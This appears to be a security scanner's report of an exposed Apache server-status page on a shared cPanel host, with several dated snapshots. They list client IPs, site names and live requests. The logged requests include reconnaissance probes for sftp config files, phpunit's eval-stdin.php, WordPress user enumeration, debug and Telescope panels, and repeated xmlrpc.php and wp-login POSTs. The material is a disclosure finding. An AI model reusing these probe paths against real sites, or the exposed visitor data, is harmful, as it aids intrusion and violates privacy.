      195.191.219.131http/1.1albayan.edu.sa:443GET /e_sch/code/news/db.php?j=5&q=1373&t=135.181.79.106&c=5 HTT
      
      0-1077620/127/12912_
      18.0435453634670.011.971512.54
      217.113.194.242http/1.1albayan.edu.sa:443GET /e_sch/code/forum/db.php?j=2&q=58&t=217.113.194.250&c=5 HTT
      
      0-1077620/125/12759_
      17.9232928345467800.070.441872.43
      77.232.124.153http/1.1jawad.com.sa:443POST /api/v.1/front/visitor/count HTTP/1.1
      
      0-1077620/134/13080_
      17.903860120452070.059.712101.40
      195.191.219.131http/1.1albayan.edu.sa:80GET /e_sch/code/forum/db.php?j=1&q=349&t=192.99.37.116&c=5 HTTP
      
      0-1077620/101/12788_
      18.0271674383650.03.341766.94
      217.113.194.241http/1.1albayan.edu.sa:443GET /albayan_library/Books.php?sec=578 HTTP/1.1
      
      0-1077620/106/13525_
      17.97253695050030.08.111673.63
      195.191.219.131http/1.1albayan.edu.sa:443GET /e_sch/code/news/db.php?j=5&q=1388&t=65.108.46.72&c=5 HTTP/
      
      0-1077620/144/12449_
      17.991526234480880.011.781710.28
      217.113.194.254http/1.1albayan.edu.sa:443GET /e_sch/code/forum/db.php?j=3&q=315&t=217.113.194.252&c=5 HT
      
      0-1077620/153/13134_
      17.93302385023650.016.191608.24
      77.232.124.153http/1.1jawad.com.sa:443GET /storage/app/public/uploads/products/DwmvnhUExSsbzj5ZxkLsXW
      
      0-1077620/176/12603_
      17.972451776596470.06.691762.58
      66.249.64.14http/1.1albayan.edu.sa:443GET /albayan_library/Categorys3.php?sec=538 HTTP/1.1
      
      0-1077620/144/12773_
      17.913310201597600.08.812117.46
      195.191.219.131http/1.1albayan.edu.sa:80GET /e_sch/code/forum/db.php?j=1&q=353&t=95.91.33.17&c=5 HTTP/1
      
      0-1077620/105/13134_
      18.0013651392023970.012.121974.88
      66.249.64.14http/1.1albayan.edu.sa:443GET /imgweb/qb40/31/log11.pdf HTTP/1.1
      
      1-10231750/30/12323_
      5.652285117864320.01.752017.46
      217.113.194.240http/1.1albayan.edu.sa:443GET /e_sch/code/forum/db.php?j=3&q=229&t=217.113.194.252&c=5 HT
      
      1-10231752/42/12724K
      5.811196237451.630.602019.05
      172.70.80.133http/1.1nidaa.ws:80GET /.vscode/sftp.json HTTP/1.1
      
      1-10231750/92/13170_
      5.69195691503790.02.141851.58
      217.113.194.242http/1.1albayan.edu.sa:443GET /albayan_library/Books.php?sec=164 HTTP/1.1
      
      1-10231750/45/12547_
      5.513010131242220.01.891454.00
      195.191.219.131http/1.1albayan.edu.sa:80GET /e_sch/code/forum/db.php?j=1&q=354&t=5.9.140.242&c=5 HTTP/1
      
      1-10231750/53/12080_
      5.8010485830350.02.081635.28
      195.191.219.131http/1.1albayan.edu.sa:443GET /e_sch/code/forum/db.php?j=1&
      Found on 2024-06-10 19:05
    • Severity: medium
      Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31d7a83140d7a83140aea97646

      Apache Status
      
      Apache Server Status for www.nidaa.ws (via 138.201.201.48)
      
      Server Version: Apache/2.4.59 (cPanel) OpenSSL/1.1.1w mod_bwlimited/1.4 Phusion_Passenger/6.0.22
      Server MPM: worker
      Server Built: May 22 2024 00:34:08
      
      Current Time: Monday, 10-Jun-2024 04:24:08 +03
      Restart Time: Thursday, 23-May-2024 04:04:49 +03
      Parent Server Config. Generation: 11
      Parent Server MPM Generation: 10
      Server uptime:  18 days 19 minutes 19 seconds
      Server load: 0.28 0.37 0.45
      Total accesses: 2464868 - Total Traffic: 387.2 GB - Total Duration: 3059111477
      CPU Usage: u849.71 s50.9 cu10795.9 cs2489.18 - .911% CPU load
      1.58 requests/sec - 260.9 kB/second - 164.7 kB/request - 1241.09 ms/request
      9 requests currently being processed, 0 workers gracefully restarting, 241 idle workers
      ___________K_____________________________________K______________
      ____________K___________________________________________C____WWW
      WWWWWWWWWWWWWWWWWWWWWW_____________________K___________K________
      __________________________W___________________________K_________
      _______________K___.............................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ........
      Scoreboard Key:
      "_" Waiting for Connection, 
      "S" Starting up, 
      "R" Reading Request,
      "W" Sending Reply, 
      "K" Keepalive (read), 
      "D" DNS Lookup,
      "C" Closing connection, 
      "L" Logging, 
      "G" Gracefully finishing, 
      "I" Idle cleanup of worker, 
      "." Open slot with no current process
      
      
      
      SrvPIDAccMCPU
      SSReqDurConnChildSlotClientProtocolVHostRequest
      
      0-10150090/188/11571_
      11.62288409112574990.017.961784.67
      5.111.156.37http/1.1albayan.edu.sa:443GET /imgweb/1445/%D8%A7%D9%88%D8%A7%D8%A6%D9%84%20%D8%A7%D9%88%
      
      0-10150090/80/10151_
      11.6919313172709200.03.641723.76
      43.129.77.146http/1.1trydaris.com:443POST /xmlrpc.php HTTP/1.1
      
      0-10150090/73/10420_
      11.701789065784490.03.311579.44
      43.129.77.146http/1.1trydaris.com:443POST /xmlrpc.php HTTP/1.1
      
      0-10150090/81/10601_
      11.701660400601830.05.271711.27
      127.0.0.1http/1.1php.we3dvi.com:80GET / HTTP/1.0
      
      0-10150090/82/10796_
      11.746810787697250.03.191597.61
      43.129.77.146http/1.1trydaris.com:443POST /xmlrpc.php HTTP/1.1
      
      0-10150090/85/10285_
      11.739786168478080.04.401973.63
      43.129.77.146http/1.1trydaris.com:443POST /xmlrpc.php HTTP/1.1
      
      0-10150090/116/10607_
      11.662523158441540.09.791788.73
      51.211.26.251http/1.1albayan.edu.sa:443GET /e_sch/font/css/bootstrap.min.css HTTP/1.1
      
      0-10150090/90/10304_
      11.68219113226612750.04.351852.57
      43.129.77.146http/1.1trydaris.com:443POST /xmlrpc.php HTTP/1.1
      
      0-10150090/69/11324_
      11.7114811390021900.015.631873.33
      43.129.77.146http/1.1trydaris.com:443POST /xmlrpc.php HTTP/1.1
      
      0-10150090/91/10957_
      11.77199280631630.03.491657.35
      43.129.77.146http/1.1trydaris.com:443POST /xmlrpc.php HTTP/1.1
      
      0-10150090/116/10548_
      11.7210995293176600.04.651395.57
      43.129.77.146http/1.1trydaris.com:443POST /xmlrpc.php HTTP/1.1
      
      0-10150091/133/11078K
      11.780068465530.84.501347.82
      172.68.195.225http/1.1nidaa.ws:80GET /about HTTP/1.1
      
      0-10150090/98/10919_
      11.6920312794046570.03.891940.63
      43.129.77.146http/1.1trydaris.com:443POST /xmlrpc.php HTTP/1.1
      
      0-10150090/224/10490_
      11.765210480291620.06.781804.82
      43.129.77.146http/1.1trydaris.com:443POST /xmlrpc.php HTTP/1.1
      
      0-10150090/82/10430_
      11.77577129140400.06.501288.13
      43.129.77.146http/1.1trydaris.com:443POST /xmlrpc.php HTTP/1.1
      
      0-10150090/48/10443_
      11.7212510252452660.01.611443.13
      43.129.77.146http/1.1trydaris.com:443POST /xmlrpc.php HTTP/1.1
      
      0-10150090/96/10590_
      11.67243111339003440.06.461718.19
      43.129.77.146http/1.1trydaris.com:443POST /xmlrpc.php HTTP/1.1
      
      0-10150090/82/10747_
      11.67225135110433110.06.211987.17
      172.70.43.3http/1.1support.daaris.com:443GET /serverstatus.php?language=english HTTP/1.1
      
      0-10150090/93/10806_
      11.60319370965460.011.461717.59
      51.211.26.251http/1.1albayan.edu.sa:443GET /imgweb/1445/%D8%AB%D8%A7%D9%84%D8%AB%20%D8%A7%D9%88%D8%A7%
      
      0-10150090/139/11169_
      11.6227711692671030.06.661585.77
      43.129.77.146http/1.1trydaris.com:443POST /xmlrpc.php HTTP/1.1
      
      0-10150090/112/10252_
      11.71137117231441010.02.611648.28
      43.129.77.146http/1.1trydaris.com:443POST /xmlrpc.php HTTP/1.1
      
      0-10150090/82/10610_
      11.66252384026410.03.921541.83
      51.211.26.251http/1.1albayan.edu.sa:443GET /e_sch/Fonts/font6/ge-ss-med.woff HTTP/1.1
      
      0-10150090/68/10576_
      11.763612073904410.02.421713.36
      43.129.77.146http/1.1trydaris.com:443POST /xmlrpc.php HTTP/1.1
      
      0-10150090/89/10694_
      11.74792200939230.04.931998.56
      31.166.130.195http/1.1albayan.edu.sa:443GET /e_sch/Fonts/font6/ge-ss-med.woff HTTP/1.1
      
      0-10150090/88/10738_
      11.613058388945700.02.701907.34
      43.129.77.146http/1.1trydaris.com:443POST /xmlrpc.php HTTP/1.1
      
      1-10315820/9/10133_
      1.8432047109160530.03.141961.10
      40.77.189.82http/1.1jawad.com.sa:443POST /api/v.1/front/related/product HTTP/1.1
      
      1-10315820/7/10691_
      1.8629711694554000.00.071780.86
      43.129.77.146http/1.1trydaris.com:443POST /xmlrpc.php HTTP/1.1
      
      1-10315820/10/10888_
      1.8530637390898370.00.621782.82
      40.77.167.23http/1.1albayan.edu.sa:443GET /imgweb/file43/spelling.pdf HTTP/1.1
      
      1-10315820/28/10734_
      1.91197121128240380.01.511392.63
      43.129.77.146http/1.1trydaris.com:443POST /xmlrpc.php HTTP/1.1
      
      1-10315820/12/10197_
      1.912119685200470.00.501586.38
      43.129.77.146http/1.1trydaris.com:443POST /xmlrpc.php HTTP/1.1
      
      1-10315820/12/10693_
      1.931559080479600.01.011567.85
      43.129.77.146http/1.1trydaris.com:443POST /xmlrpc.php HTTP/1.1
      
      1-10315820/8/10345_
      1.89231289107207300.03.361744.83
      5.111.156.37http/1.1albayan.edu.sa:443GET /imgweb/1445/%D8%A7%D9%88%D8%A7%D8%A6%D9%84%20%D8%AB%D8%A7%
      
      1-10315820/11/10505_
      1.8924813779588820.00.071368.92
      43.129.77.146http/1.1trydaris.com:443
      Found on 2024-06-10 01:24
    • Severity: medium
      Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31d7a83140d7a8314050aef223

      Apache Status
      
      Apache Server Status for www.nidaa.ws (via 138.201.201.48)
      
      Server Version: Apache/2.4.59 (cPanel) OpenSSL/1.1.1w mod_bwlimited/1.4 Phusion_Passenger/6.0.22
      Server MPM: worker
      Server Built: May 22 2024 00:34:08
      
      Current Time: Saturday, 08-Jun-2024 22:28:40 +03
      Restart Time: Thursday, 23-May-2024 04:04:49 +03
      Parent Server Config. Generation: 10
      Parent Server MPM Generation: 9
      Server uptime:  16 days 18 hours 23 minutes 50 seconds
      Server load: 0.36 0.50 0.49
      Total accesses: 2257731 - Total Traffic: 358.2 GB - Total Duration: 2833055172
      CPU Usage: u995.77 s104.81 cu9634.31 cs2184.96 - .892% CPU load
      1.56 requests/sec - 259.3 kB/second - 166.4 kB/request - 1254.82 ms/request
      16 requests currently being processed, 0 workers gracefully restarting, 234 idle workers
      ________________W______K________________________________________
      _K__W__RR____K_____________W_______W_________________________WWW
      WWWWWWWWWWWWWWWWWWWWWW__________________________________________
      _____W____________________________W__K____R_____________________
      __K__K____R________.............................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ........
      Scoreboard Key:
      "_" Waiting for Connection, 
      "S" Starting up, 
      "R" Reading Request,
      "W" Sending Reply, 
      "K" Keepalive (read), 
      "D" DNS Lookup,
      "C" Closing connection, 
      "L" Logging, 
      "G" Gracefully finishing, 
      "I" Idle cleanup of worker, 
      "." Open slot with no current process
      
      
      
      SrvPIDAccMCPU
      SSReqDurConnChildSlotClientProtocolVHostRequest
      
      0-9226310/133/10561_
      11.7531815107645280.04.271605.67
      142.247.220.28http/1.1jawad.com.sa:443POST /api/v.1/front/related/product HTTP/1.1
      
      0-9226310/119/9338_
      11.08115069909840.011.401648.90
      51.36.220.244http/1.1
      
      0-9226310/65/9593_
      11.91162259844940.08.991490.18
      51.36.221.45http/1.1albayan.edu.sa:443GET /e_sch/font/font/fontawesome-webfont.woff?v=3.2.1 HTTP/1.1
      
      0-9226310/61/9612_
      12.05213397395250.03.101562.41
      138.201.201.48http/1.1sulaimaniya.edu.sa:443POST /wp-cron.php?doing_wp_cron=1717874899.17872691154479980468
      
      0-9226310/73/10037_
      11.851909520785186300.05.201553.35
      154.73.113.252http/1.1albayan.edu.sa:443GET /imgweb/book/mfiqhi1.pdf HTTP/1.1
      
      0-9226310/105/9374_
      11.752971161639110.039.681826.36
      66.249.64.128http/1.1jawad.com.sa:80GET /en/index.php?a=3&i=0&c=65 HTTP/1.1
      
      0-9226310/56/9720_
      11.63321156801080.04.781705.97
      5.109.234.0http/1.1
      
      0-9226310/74/9542_
      11.82209620223862430.017.771730.61
      66.249.64.12http/1.1albayan.edu.sa:443GET /imgweb/1445/%D8%AA%D8%AC%D9%85%D9%8A%D8%B9%D8%A7%D8%AA%20%
      
      0-9226310/86/10337_
      11.93155480467280.055.891773.07
      168.149.48.27http/1.1albayan.edu.sa:443GET /e_sch/poll.php HTTP/1.1
      
      0-9226310/64/10040_
      11.96127376982920.02.491568.18
      176.224.249.92http/1.1albayan.edu.sa:443GET /e_sch/Fonts/font6/ge-ss-med.woff HTTP/1.1
      
      0-9226310/129/9567_
      10.891750291073760.024.801284.86
      51.223.135.142http/1.1
      
      0-9226310/76/10218_
      12.05735764927520.09.011261.02
      5.109.234.0http/1.1sulaimaniya.edu.sa:443GET /%d8%ac%d9%88%d8%af%d8%a9/ HTTP/1.1
      
      0-9226310/59/9792_
      11.73326189785240.028.291874.48
      66.118.174.163http/1.1garndhabi.org:80GET /uploads/cities/152024239844096.jpg HTTP/1.1
      
      0-9226310/64/9523_
      12.0334173210860.021.541672.88
      2.90.216.144http/1.1albayan.edu.sa:443GET /e_sch/Fonts/font6/ge-ss-med.woff HTTP/1.1
      
      0-9226310/118/9437_
      11.911580123854950.03.321220.74
      66.118.176.72http/1.1albayan.edu.sa:443GET /e_sch/images/complaints_and_suggestions.png HTTP/1.1
      
      0-9226310/65/9585_
      11.9414240150370310.012.421378.02
      66.118.174.163http/1.1garndhabi.org:80GET /uploads/photo/1670697714RIkuxKMhbAz2jwdY82331.png HTTP/1.1
      
      0-9226310/50/9737W
      11.692247335709300.02.971634.83
      47.128.35.197http/1.1sulaimaniya.edu.sa:443GET /portfolios/%D8%A8%D9%8A%D9%86-%D8%A7%D9%84%D9%85%D8%A7%D8%
      
      0-9226310/77/9956_
      11.941333106489020.034.951815.27
      5.109.234.0http/1.1sulaimaniya.edu.sa:443GET /wp-content/uploads/useanyfont/uaf.css?ver=1717874294 HTTP/
      
      0-9226310/100/9816_
      11.402433568356200.09.321659.19
      2.90.252.105http/1.1
      
      0-9226310/74/10201_
      12.0148274797800.032.591440.46
      2.90.216.144http/1.1albayan.edu.sa:443GET /favicon.ico HTTP/1.1
      
      0-9226310/65/9433_
      11.8121922224803460.06.381427.20
      127.0.0.1http/1.1php.we3dvi.com:80GET /whm-server-status HTTP/1.0
      
      0-9226310/80/9867_
      11.9414811700178876600.019.461423.80
      51.223.135.142http/1.1sulaimaniya.edu.sa:443GET /download/52/%D9%81%D9%8A%D8%B2%D9%8A%D8%A7%D8%A1/1903/%D8%
      
      0-9226310/78/9667_
      11.8618247770781470.030.091611.15
      66.118.174.163http/1.1garndhabi.org:80GET /uploads/cities/152025039740938.jpg HTTP/1.1
      
      0-9226311/85/9866K
      12.0601196118050.930.491778.33
      172.69.22.224http/1.1nidaa.ws:80GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor
      
      0-9226310/56/9911_
      12.0689784163910.060.831817.98
      68.178.146.19http/1.1sulaimaniya.edu.sa:443POST /xmlrpc.php HTTP/1.1
      
      1-9232340/606/9206_
      75.29189195799420.093.131808.41
      66.118.174.163http/1.1garndhabi.org:80GET /uploads/cities/152025157591805.jpg HTTP/1.1
      
      1-9232340/578/9805_
      74.56320485287740.0108.791680.30
      51.36.0.77http/1.1
      
      1-9232340/565/9997_
      75.3753880305330.057.921683.48
      2.90.216.144http/1.1albayan.edu.sa:443GET / HTTP/1.1
      
      1-9232340/555/9753_
      74.991242125755210.0103.151257.05
      176.224.249.92http/1.1
      
      1-9232340/507/9371_
      74.803308582043660.098.341517.55
      51.36.0.77http/1.1
      
      1-9232340/555/9918_
      75.252462454973560300.0120.761381.35
      5.109.234.0http/1.1sulaimaniya.edu.sa:443GET /wp-content/uploads/2021/12/002.png HTTP/1.1
      
      1-9232340/486/9484_
      75.3414768104399160.0170.711684.27
      66.118.174.163http/1.1garndhabi.org:80GET /api/v1/members?page=1&city_id=2 HTTP/1.1
      
      1-9232340/600/9619_
      75.3018233677834060.0102.761265.43
      66.
      Found on 2024-06-08 19:28
    • Severity: medium
      Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31d7a83140d7a83140042f0be3

      Apache Status
      
      Apache Server Status for www.nidaa.ws (via 138.201.201.48)
      
      Server Version: Apache/2.4.59 (cPanel) OpenSSL/1.1.1w mod_bwlimited/1.4 Phusion_Passenger/6.0.22
      Server MPM: worker
      Server Built: May 22 2024 00:34:08
      
      Current Time: Saturday, 08-Jun-2024 21:53:03 +03
      Restart Time: Thursday, 23-May-2024 04:04:49 +03
      Parent Server Config. Generation: 10
      Parent Server MPM Generation: 9
      Server uptime:  16 days 17 hours 48 minutes 13 seconds
      Server load: 0.23 0.37 0.37
      Total accesses: 2255511 - Total Traffic: 356.9 GB - Total Duration: 2829801301
      CPU Usage: u980.8 s99.79 cu9634.31 cs2184.96 - .892% CPU load
      1.56 requests/sec - 258.8 kB/second - 165.9 kB/request - 1254.62 ms/request
      10 requests currently being processed, 0 workers gracefully restarting, 240 idle workers
      ________________________________________________________________
      ____WW_____K_______________________WK________________________WWW
      WWWWWWWWWWWWWWWWWWWWWW_______________________________K_____R____
      _________________________K_______________________W______________
      ______K____________.............................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ........
      Scoreboard Key:
      "_" Waiting for Connection, 
      "S" Starting up, 
      "R" Reading Request,
      "W" Sending Reply, 
      "K" Keepalive (read), 
      "D" DNS Lookup,
      "C" Closing connection, 
      "L" Logging, 
      "G" Gracefully finishing, 
      "I" Idle cleanup of worker, 
      "." Open slot with no current process
      
      
      
      SrvPIDAccMCPU
      SSReqDurConnChildSlotClientProtocolVHostRequest
      
      0-9226310/127/10555_
      10.2591107620040.03.341604.74
      134.122.28.88http/1.1white-petals.com:80GET / HTTP/1.1
      
      0-9226310/113/9332_
      10.1098069883180.010.561648.05
      66.249.64.13http/1.1albayan.edu.sa:443GET /imgweb/file42/1/%D8%A7%D9%84%D8%AA%D8%B1%D8%A8%D9%8A%D8%A9
      
      0-9226310/54/9582_
      9.852098059758650.08.401489.58
      198.12.235.186http/1.1trynidaa.com:443POST /xmlrpc.php HTTP/1.1
      
      0-9226310/54/9605_
      10.081851397393510.02.971562.28
      74.125.208.109http/1.1albayan.edu.sa:443GET /e_sch/Fonts/font6/ge-ss-med.woff HTTP/1.1
      
      0-9226310/62/10026_
      10.256183227600.04.591552.74
      134.122.28.88http/1.1white-petals.com:80GET /.DS_Store HTTP/1.1
      
      0-9226310/89/9358_
      10.2552161630900.039.331826.01
      134.122.28.88http/1.1white-petals.com:80GET /?rest_route=/wp/v2/users/ HTTP/1.1
      
      0-9226310/47/9711_
      10.1078132156799100.04.481705.68
      54.229.146.165http/1.1sulaimaniya.edu.sa:443GET /download/52/%D9%81%D9%8A%D8%B2%D9%8A%D8%A7%D8%A1/1903/%D8%
      
      0-9226310/65/9533_
      9.84272836223806390.011.171724.01
      66.249.64.13http/1.1albayan.edu.sa:443GET /albayan_library/upload/books/daifaa12.pdf HTTP/1.1
      
      0-9226310/75/10326_
      10.05193279590700.047.121764.30
      85.195.143.154http/1.1albayan.edu.sa:443GET /web/images/name_school.png HTTP/1.1
      
      0-9226310/53/10029_
      10.091195876967100.02.181567.87
      5.111.49.36http/1.1garndhabi.org:80GET /api/v1/cities?type=all HTTP/1.1
      
      0-9226310/120/9558_
      10.2512291035880.024.731284.79
      172.69.130.82http/1.1nidaa.ws:80GET / HTTP/1.1
      
      0-9226310/71/10213_
      10.12321964916390.08.661260.67
      194.169.175.63http/1.1filter.jawad.com.sa:443GET /my.policy HTTP/1.1
      
      0-9226310/49/9782_
      10.2418479589738360.026.931873.12
      114.119.159.40http/1.1albayan.edu.sa:443GET /imgweb/5/Tarbeaejtexr22.pdf HTTP/1.1
      
      0-9226310/52/9511_
      9.65674573199040.021.221672.56
      176.224.99.238http/1.1
      
      0-9226310/112/9431_
      10.08177255123848950.03.131220.54
      85.195.143.154http/1.1albayan.edu.sa:443GET /imgweb/files40/combinepdf%20(1).pdf HTTP/1.1
      
      0-9226310/55/9575_
      10.07185650355160.011.901377.50
      176.224.99.238http/1.1albayan.edu.sa:443GET /e_sch/poll.php HTTP/1.1
      
      0-9226310/45/9732_
      10.113839335698290.02.451634.31
      51.222.42.163http/1.1new-filter.jawad.com.sa:80GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.
      
      0-9226310/72/9951_
      10.021972053106477310.034.681815.00
      37.42.48.117http/1.1sulaimaniya.edu.sa:443GET /download/52/%D9%81%D9%8A%D8%B2%D9%8A%D8%A7%D8%A1/1903/%D8%
      
      0-9226310/97/9813_
      9.8030454868352620.09.221659.09
      5.111.49.36http/1.1garndhabi.org:80GET /uploads/photo/1560088535kPsc4gJmWko3qjuO53889.png HTTP/1.1
      
      0-9226310/52/10179_
      10.114410574785000.029.841437.71
      3.250.220.50http/1.1sulaimaniya.edu.sa:443GET /download/52/%D9%81%D9%8A%D8%B2%D9%8A%D8%A7%D8%A1/1903/%D8%
      
      0-9226310/54/9422_
      9.8423875224786180.05.491426.31
      5.111.49.36http/1.1garndhabi.org:80GET /api/v1/members?city_id=4&page=16 HTTP/1.1
      
      0-9226310/75/9862_
      9.793443176524730.05.051409.39
      5.111.49.36http/1.1garndhabi.org:80GET /admin/dashboard HTTP/1.1
      
      0-9226310/65/9654_
      9.852178270687150.04.391585.44
      120.76.178.215http/1.1trynidaa.com:443POST /xmlrpc.php HTTP/1.1
      
      0-9226310/68/9849_
      10.2581196034090.02.761750.59
      134.122.28.88http/1.1white-petals.com:80GET /debug/default/view?panel=config HTTP/1.1
      
      0-9226310/50/9905_
      9.7411184145490.060.321817.47
      172.105.16.40http/1.1
      
      1-9232340/598/9198_
      73.1424236995761160.091.171806.45
      40.77.167.78http/1.1albayan.edu.sa:443GET /imgweb/1445/%D8%B3%D8%A7%D8%AF%D8%B3%20%D8%B1%D9%8A%D8%A7%
      
      1-9232340/575/9802_
      73.25325185279170.0108.391679.90
      194.169.175.63http/1.1filter.jawad.com.sa:443GET / HTTP/1.1
      
      1-9232340/559/9991_
      73.24529680303570.057.611683.17
      54.36.148.108http/1.1daris.live:443GET /blog/tag/Stress HTTP/1.1
      
      1-9232340/542/9740_
      73.211851125671790.092.721246.62
      74.125.208.109http/1.1albayan.edu.sa:443GET /e_sch/css/theme.css HTTP/1.1
      
      1-9232340/492/9356_
      73.273181962440.097.561516.76
      134.122.28.88http/1.1white-petals.com:80GET /telescope/requests HTTP/1.1
      
      1-9232340/550/9913_
      73.27213173068170.094.891355.49
      37.27.2.206http/1.1trydaris.com:443POST /xmlrpc.php HTTP/1.1
      
      1-9232340/477/9475_
      72.91983104366020.0169.331682.89
      51.36.171.57http/1.1
      
      1-9232340/591/9610_
      72.802195977741690.0100.111262.
      Found on 2024-06-08 18:53
    • Severity: medium
      Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31d7a83140d7a831402aa219bf

      Apache Status
      
      Apache Server Status for www.nidaa.ws (via 138.201.201.48)
      
      Server Version: Apache/2.4.59 (cPanel) OpenSSL/1.1.1w mod_bwlimited/1.4 Phusion_Passenger/6.0.22
      Server MPM: worker
      Server Built: May 22 2024 00:34:08
      
      Current Time: Thursday, 06-Jun-2024 20:14:55 +03
      Restart Time: Thursday, 23-May-2024 04:04:49 +03
      Parent Server Config. Generation: 10
      Parent Server MPM Generation: 9
      Server uptime:  14 days 16 hours 10 minutes 6 seconds
      Server load: 0.63 0.52 0.45
      Total accesses: 2063095 - Total Traffic: 318.8 GB - Total Duration: 2487192783
      CPU Usage: u1098.69 s128.1 cu8562.85 cs1949.77 - .926% CPU load
      1.63 requests/sec - 263.7 kB/second - 162.0 kB/request - 1205.56 ms/request
      10 requests currently being processed, 0 workers gracefully restarting, 240 idle workers
      ______________________________________________K_________________
      _K________________________W___W____________________K_________WWW
      WWWWWWWWWWWWWWWWWWWWWW___________R_____________________W___K____
      _____________K____________________________________________......
      ...................________K________________....................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ........
      Scoreboard Key:
      "_" Waiting for Connection, 
      "S" Starting up, 
      "R" Reading Request,
      "W" Sending Reply, 
      "K" Keepalive (read), 
      "D" DNS Lookup,
      "C" Closing connection, 
      "L" Logging, 
      "G" Gracefully finishing, 
      "I" Idle cleanup of worker, 
      "." Open slot with no current process
      
      
      
      SrvPIDAccMCPU
      SSReqDurConnChildSlotClientProtocolVHostRequest
      
      0-9126910/499/9773_
      59.69609163100384820.062.571383.74
      66.249.66.207http/1.1sulaimaniya.edu.sa:80GET / HTTP/1.1
      
      0-9126910/471/8575_
      59.715941958693980.052.031485.83
      127.0.0.1http/1.1php.we3dvi.com:80GET /whm-server-status HTTP/1.0
      
      0-9126910/484/8865_
      59.755162854582680.079.231259.95
      66.249.66.83http/1.1albayan.edu.sa:443GET /web.html HTTP/1.1
      
      0-9126910/564/8932_
      59.696283390819210.0115.821352.98
      93.112.211.196http/1.1albayan.edu.sa:443GET /school/school/image_max/web/image_news/________1_11.png HT
      
      0-9126910/469/9242_
      59.84268180190500.059.851383.91
      93.169.145.96http/1.1jawad.com.sa:443GET /public/front_resources/css/style_ar.css HTTP/1.1
      
      0-9126910/500/8564_
      59.7645142567683950.078.591673.41
      114.119.153.122http/1.1daris.live:80GET /product/92 HTTP/1.1
      
      0-9126910/502/8809_
      59.7835282113668140.050.031494.52
      40.77.167.28http/1.1albayan.edu.sa:443GET /web/336.html2 HTTP/1.1
      
      0-9126910/434/8699_
      59.96856167167640.051.611572.07
      107.189.6.212http/1.1trydaris.com:443POST /wp-login.php HTTP/1.1
      
      0-9126910/489/9620_
      59.852632575617840.076.891615.35
